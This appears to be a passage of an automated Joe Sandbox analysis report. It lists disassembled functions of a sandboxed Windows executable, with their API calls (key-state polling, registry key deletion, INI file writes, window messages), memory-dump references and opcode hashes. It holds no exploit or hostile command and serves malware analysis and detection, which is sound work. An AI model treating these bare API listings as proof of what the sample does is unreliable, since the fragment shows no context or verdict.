                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 15295421-0
                                                                                                                                                    • Opcode ID: d8d3d6a2cecaed762a510ed52f320a3b4f5546c74b9e94ec6e10ba7928b5d5b3
                                                                                                                                                    • Instruction ID: 481e56be03c4cee60d8ca92471cfa4b3875eab78bcfcbf7fb961631f720e0f99
                                                                                                                                                    • Opcode Fuzzy Hash: d8d3d6a2cecaed762a510ed52f320a3b4f5546c74b9e94ec6e10ba7928b5d5b3
                                                                                                                                                    • Instruction Fuzzy Hash: 7D515F71208301ABD304EF65C885E5BB7A8FF88704F10892EB54597291D774E945CBA6
                                                                                                                                                    Function 00456391 Relevance: 7.6, APIs: 5, Instructions: 130keyboardCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetCursorPos.USER32(?), ref: 004563A6
                                                                                                                                                    • ScreenToClient.USER32(?,?), ref: 004563C3
                                                                                                                                                    • GetAsyncKeyState.USER32(?), ref: 00456400
                                                                                                                                                    • GetAsyncKeyState.USER32(?), ref: 00456410
                                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00456466
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AsyncState$ClientCursorLongScreenWindow
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3539004672-0
                                                                                                                                                    • Opcode ID: 47775ca2c9d3ed855d965de7f9cc13cd0d0477b61ed95063c4b58fcc2d2fd159
                                                                                                                                                    • Instruction ID: 60090bce41a6de58f2ab96a8453d1e3558661e38fd0c916b19f374a884add038
                                                                                                                                                    • Opcode Fuzzy Hash: 47775ca2c9d3ed855d965de7f9cc13cd0d0477b61ed95063c4b58fcc2d2fd159
                                                                                                                                                    • Instruction Fuzzy Hash: 49414C74504204BBDB24CF65C884EEFBBB8EB46326F60464EFC6593281CB34A944CB68
                                                                                                                                                    Function 0047D40F Relevance: 7.6, APIs: 5, Instructions: 120sleepCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D438
                                                                                                                                                    • InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D44D
                                                                                                                                                    • Sleep.KERNEL32(0000000A), ref: 0047D455
                                                                                                                                                    • InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D460
                                                                                                                                                    • InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D56A
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Interlocked$DecrementIncrement$Sleep
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 327565842-0
                                                                                                                                                    • Opcode ID: a05157aca8d30d558f467c32ec822d8ac937f36e77973d55cccdaa836f381863
                                                                                                                                                    • Instruction ID: e00c67d4cb89bf1d5311357fb713975cbca1e0cfcee7190b0451066ade77f289
                                                                                                                                                    • Opcode Fuzzy Hash: a05157aca8d30d558f467c32ec822d8ac937f36e77973d55cccdaa836f381863
                                                                                                                                                    • Instruction Fuzzy Hash: CC412571A002055FEB10DF65CD84AEE7774EF45304B10852EF609A7351E738EE46CB99
                                                                                                                                                    Function 0045C3C1 Relevance: 7.6, APIs: 5, Instructions: 118COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetPrivateProfileSectionW.KERNEL32(00000000,?,?,00007FFF), ref: 0045C44F
                                                                                                                                                    • GetPrivateProfileSectionW.KERNEL32(00000000,00000003,?,00000003), ref: 0045C477
                                                                                                                                                    • WritePrivateProfileSectionW.KERNEL32(00000000,00000003,?), ref: 0045C4C3
                                                                                                                                                    • WritePrivateProfileStringW.KERNEL32(00000000,?,00000000,00000000), ref: 0045C4E7
                                                                                                                                                    • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0045C4F6
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: PrivateProfile$SectionWrite$String
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2832842796-0
                                                                                                                                                    • Opcode ID: c9f10585610fffa7a4941cd4de679b7a605c4e2db3209749f595237ca159c93c
                                                                                                                                                    • Instruction ID: 1eb5009190fa999c36a74edd43b7bd9b51adbc8f8691a9c3f5840d50e9073e8b
                                                                                                                                                    • Opcode Fuzzy Hash: c9f10585610fffa7a4941cd4de679b7a605c4e2db3209749f595237ca159c93c
                                                                                                                                                    • Instruction Fuzzy Hash: D1413075A00209BFDB10EFA1DC85FAAB7A8BF44305F10855EF9049B292DA79EE44CB54
                                                                                                                                                    Function 00441C7B Relevance: 7.6, APIs: 5, Instructions: 108registryCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • RegEnumKeyExW.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 00441CA9
                                                                                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00441CDD
                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00441CFE
                                                                                                                                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 00441D40
                                                                                                                                                    • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00441D6E
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Enum$CloseDeleteOpen
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2095303065-0
                                                                                                                                                    • Opcode ID: d2ce045a3c5b7a9f88abc7d1956311aab30076c6419bcb4202e5cbde6d6cad15
                                                                                                                                                    • Instruction ID: 7ca4c7ada97503ad9332fce322fe5d5fc03c2789ff93db080e75f28165cdf273
                                                                                                                                                    • Opcode Fuzzy Hash: d2ce045a3c5b7a9f88abc7d1956311aab30076c6419bcb4202e5cbde6d6cad15
                                                                                                                                                    • Instruction Fuzzy Hash: 69317CB2940108BAEB10DBD4DC85FFEB77CEB49304F04456EF605A7241D774AA858BA8
                                                                                                                                                    Function 00436A0B Relevance: 7.6, APIs: 5, Instructions: 103COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00436A24
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: RectWindow
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 861336768-0
                                                                                                                                                    • Opcode ID: d215e6d8dffd18d1ffc2da0b67cce38d66530bec6329dda4924901d83a0034d3
                                                                                                                                                    • Instruction ID: 0a42da3bb0701689e96ef39581243ed39d97d4ba46bd7cd8c1f057aae640e0d3
                                                                                                                                                    • Opcode Fuzzy Hash: d215e6d8dffd18d1ffc2da0b67cce38d66530bec6329dda4924901d83a0034d3
                                                                                                                                                    • Instruction Fuzzy Hash: E531EA7160021EAFDB00DF68D988AAE77A5EB49324F11C62AFD24E7380D774EC11CB90
                                                                                                                                                    Function 00449555 Relevance: 7.6, APIs: 5, Instructions: 96windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SendMessageW.USER32 ref: 00449598
                                                                                                                                                      • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
                                                                                                                                                    • SendMessageW.USER32(?,00001074,?,?), ref: 004495F8
                                                                                                                                                    • _wcslen.LIBCMT ref: 0044960D
                                                                                                                                                    • _wcslen.LIBCMT ref: 0044961A
                                                                                                                                                    • SendMessageW.USER32(?,00001074,?,?), ref: 0044964E
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSend$_wcslen$_wcspbrk
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1856069659-0
                                                                                                                                                    • Opcode ID: eb2345d78995945919f1fca8909d98cd083db74a4e9b61e28a7ea2bcab757230
                                                                                                                                                    • Instruction ID: 683be220b4a5e9d86ccbf412c3bd2f13dbb60120779f28b1c577ab6eeef24407
                                                                                                                                                    • Opcode Fuzzy Hash: eb2345d78995945919f1fca8909d98cd083db74a4e9b61e28a7ea2bcab757230
                                                                                                                                                    • Instruction Fuzzy Hash: 77318F71A00218ABEB20DF59DC80BDFB374FF94314F10466AFA0497280E7B59D958B94
                                                                                                                                                    Function 004478AC Relevance: 7.6, APIs: 5, Instructions: 96windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetCursorPos.USER32(?), ref: 004478E2
                                                                                                                                                    • TrackPopupMenuEx.USER32(00000000,00000000,?,?,?,00000000), ref: 004478FC
                                                                                                                                                    • DefDlgProcW.USER32(?,0000007B,?,?), ref: 0044791D
                                                                                                                                                    • GetCursorPos.USER32(00000000), ref: 0044796A
                                                                                                                                                    • TrackPopupMenuEx.USER32(02FB6648,00000000,00000000,?,?,00000000), ref: 00447991
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CursorMenuPopupTrack$Proc
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1300944170-0
                                                                                                                                                    • Opcode ID: 3a0c1b1e924032964aae082f89503a6e76aba0c647238f1368234d9f75c94910
                                                                                                                                                    • Instruction ID: 8079d3ea29232e2d8a780d7c6517a0c600664366e77620ab1eef72d1e193e80f
                                                                                                                                                    • Opcode Fuzzy Hash: 3a0c1b1e924032964aae082f89503a6e76aba0c647238f1368234d9f75c94910
                                                                                                                                                    • Instruction Fuzzy Hash: EF31CF75600108AFE724CF59DC88FABB768EB89310F20455AF94587391C775AC53CBA8
                                                                                                                                                    Function 004479A0 Relevance: 7.6, APIs: 5, Instructions: 96COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetClientRect.USER32(?,?), ref: 004479CC
                                                                                                                                                    • GetCursorPos.USER32(?), ref: 004479D7
                                                                                                                                                    • ScreenToClient.USER32(?,?), ref: 004479F3
                                                                                                                                                    • WindowFromPoint.USER32(?,?), ref: 00447A34
                                                                                                                                                    • DefDlgProcW.USER32(?,00000020,?,?), ref: 00447AAD
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Client$CursorFromPointProcRectScreenWindow
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1822080540-0
                                                                                                                                                    • Opcode ID: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
                                                                                                                                                    • Instruction ID: a7e7621e8492875af53c289f1ad187460d50aec5ad556b3834d9a5cb4abdf121
                                                                                                                                                    • Opcode Fuzzy Hash: 0f9a8e9b3e4e036e66763aee309a2391e7a5810cceb8633c4940fa55a949c157
                                                                                                                                                    • Instruction Fuzzy Hash: B831A2741082029FE710DF69D884D7FB7A4FB89314F144A1EF850D7291D774E946CBA6
                                                                                                                                                    Function 00447BF1 Relevance: 7.6, APIs: 5, Instructions: 95COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetWindowRect.USER32(?,?), ref: 00447C5D
                                                                                                                                                    • ScreenToClient.USER32(?,?), ref: 00447C7B
                                                                                                                                                    • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
                                                                                                                                                    • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
                                                                                                                                                    • EndPaint.USER32(?,?), ref: 00447D13
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ClientPaintRectRectangleScreenViewportWindow
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 659298297-0
                                                                                                                                                    • Opcode ID: 9df24dda7700d3462e91b7be9c0077b8f1985bebde9900174ed076ebcab1caeb
                                                                                                                                                    • Instruction ID: 3c0582d8bc81ba5dadaaf244cb1f1d3939805113443e317e1f98b5bdeebaec33
                                                                                                                                                    • Opcode Fuzzy Hash: 9df24dda7700d3462e91b7be9c0077b8f1985bebde9900174ed076ebcab1caeb
                                                                                                                                                    • Instruction Fuzzy Hash: C33161706043019FE310CF25D8C8F7B7BE8EB86724F144A6EF9A5872A1C774A845DB69
                                                                                                                                                    Function 004487EA Relevance: 7.6, APIs: 5, Instructions: 89COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                                                                                                                    • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                                                                                                                    • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                                                                                                                    • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                                                                                                                    • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                                                                                                                      • Part of subcall function 00440D98: SendMessageW.USER32(?,000000F0,00000000,00000000), ref: 00440DB8
                                                                                                                                                      • Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440DFA
                                                                                                                                                      • Part of subcall function 00440D98: GetWindowLongW.USER32(?,000000F0), ref: 00440E3A
                                                                                                                                                      • Part of subcall function 00440D98: SendMessageW.USER32(02FB5FA0,000000F1,00000000,00000000), ref: 00440E6E
                                                                                                                                                      • Part of subcall function 00440D98: SendMessageW.USER32(02FB5FA0,000000F1,00000001,00000000), ref: 00440E9A
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Window$EnableMessageSend$LongShow
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 142311417-0
                                                                                                                                                    • Opcode ID: 426854c6b9cbeb660193a9c091743316caa306963ba13d8f93245475b3a006f2
                                                                                                                                                    • Instruction ID: c941ec4e4e3d0536419715940b2668e48b64c275bb9f23e9dd6fd7b29375311a
                                                                                                                                                    • Opcode Fuzzy Hash: 426854c6b9cbeb660193a9c091743316caa306963ba13d8f93245475b3a006f2
                                                                                                                                                    • Instruction Fuzzy Hash: DE21F7B17443805BF7258E24CCC4BAFB7D0EF56345F08482EF98196391DBACA885C75A
                                                                                                                                                    Function 004550FC Relevance: 7.6, APIs: 5, Instructions: 78COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: cfa96c7b92ceffa4878489be5d10f88277f639196488ca8149908940c9a32487
                                                                                                                                                    • Instruction ID: af34b986bc09d21a6a739d25b45c5a22770885c200d938a8bd6fc5fff5094107
                                                                                                                                                    • Opcode Fuzzy Hash: cfa96c7b92ceffa4878489be5d10f88277f639196488ca8149908940c9a32487
                                                                                                                                                    • Instruction Fuzzy Hash: 5921AE75200600DBC710EF29E9D496B77B9EF49362B00466EFE5197392DB34EC09CB69
                                                                                                                                                    Function 00445870 Relevance: 7.6, APIs: 5, Instructions: 78windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • IsWindowVisible.USER32(?), ref: 00445879
                                                                                                                                                    • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00445893
                                                                                                                                                    • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 004458CD
                                                                                                                                                    • _wcslen.LIBCMT ref: 004458FB
                                                                                                                                                    • CharUpperBuffW.USER32(00000000,00000000), ref: 00445905
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3087257052-0
                                                                                                                                                    • Opcode ID: 6cc24b952e3a2cfd6b1dca4c82ac181d44f2854b1024d3fd347f222e2bb7600f
                                                                                                                                                    • Instruction ID: ced771b0f23340e5f55e8fdbc4e1763ce6d97a07fd0b425722e47bce61cb145a
                                                                                                                                                    • Opcode Fuzzy Hash: 6cc24b952e3a2cfd6b1dca4c82ac181d44f2854b1024d3fd347f222e2bb7600f
                                                                                                                                                    • Instruction Fuzzy Hash: F51136726009017BFB10AB25DC06F9FB78CAF65360F04403AF909D7241EB69ED5983A9
